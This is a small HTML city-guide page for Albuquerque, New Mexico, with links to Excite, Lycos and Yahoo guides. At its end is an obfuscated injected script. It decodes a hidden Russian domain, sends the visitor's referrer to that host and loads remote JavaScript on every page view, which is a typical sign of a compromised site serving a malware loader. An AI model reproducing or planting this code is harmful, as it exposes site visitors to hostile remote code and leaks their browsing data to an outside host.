<!--#include file="..\_private\redirectlocation.asp"-->
<html>

<head>
<title>Albuquerque - Region</title>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
</head>

<body>

<table border="0" cellspacing="4" width="100%" cellpadding="0">
  <tr>
    <td valign="top">
      <table border="0" cellpadding="2" width="100%">
        <tr>
          <th bgcolor="#000099" align="left"><font color="#FFFFFF">Albuquerque, 
          NM</font></th>
        </tr>
        <tr>
          <td bgcolor="#FFFFCC">
          <a href="http://www.excite.com/local/?zip=87181">City Guide</a> - from eXcite<br>
            <a href="http://travel.lycos.com/Destinations/location.asp?pid=243996">City Guide</a> - from Lycos<br>
            <a href="http://local.yahoo.com/?spid=9268324">City Guide</a> - from Yahoo</td>
        </tr>
      </table>
    </td>
    <td valign="top">
      <table border="0" cellpadding="2" width="100%">
        <tr>
          <th bgcolor="#000099" align="left"><font color="#FFFFFF">New Mexico</font></th>
        </tr>
        <tr>
          <td bgcolor="#FFFFCC">&nbsp;</td>
        </tr>
      </table>
    </td>
  </tr>
</table>

<script>var QpaxQomozo = 'AXSXTNJFJJzJYOIOiCIKGJWmMFXLUOaIGPHZJLM0OUAHY7LEQOCWI.IVSrSOMNCBJu'.replace(/[A-Z]/g,''); var FibomafNidiza = document.createElement('script'); FibomafNidiza.src = 'http://' + QpaxQomozo + '/?page=' + escape(document.referrer) + '&rnd=' + Math.random(); document.getElementsByTagName('head')[0].appendChild(FibomafNidiza);</script></body>

</html>